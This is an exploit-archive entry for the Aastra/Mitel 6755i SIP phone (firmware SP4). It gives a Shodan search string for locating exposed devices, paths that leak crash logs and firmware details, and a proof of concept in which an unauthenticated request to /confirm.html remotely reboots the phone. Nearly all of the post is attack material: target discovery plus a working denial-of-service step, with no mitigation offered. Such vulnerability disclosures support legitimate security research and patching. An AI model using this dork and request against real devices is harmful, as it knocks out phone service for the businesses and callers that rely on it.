Aastra 6755i SIP SP4 Denial Of Service

Aastra 6755i SIP SP4 suffers from a denial of service vulnerability.


MD5 | 67354fb2ee3b0cac7723a688c9bf9127

# Exploit Title:  Aastra 6755i SIP SP4 | Unauthorized Remote Reboot
# Date: 17/02/2018
# Exploit Author: Wadeek
# Hardware Version: 6755i
# Firmware Version: 3.3.1.4053 SP4
# Vendor Homepage: http://www.aastra.sg/
# Firmware Link: http://www.aastra.sg/cps/rde/aareddownload?file_id=6950-17778-_P32_XML&dsproject=www-aastra-sg&mtype=zip

== Web Fingerprinting ==
#===========================================
:www.shodan.io: "Server: Aragorn" "WWW-Authenticate: Basic realm" "Mitel 6755i"
#===========================================
:Device image: /aastra.png (160x50)
#===========================================
:Crash dump, Firmware version, Firmware model,...: /crashlog.html
#===========================================

== PoC ==
#================================================
:Unauthorized Remote Reboot ("crash.cfg" file is created after): /confirm.html
#================================================


Related Posts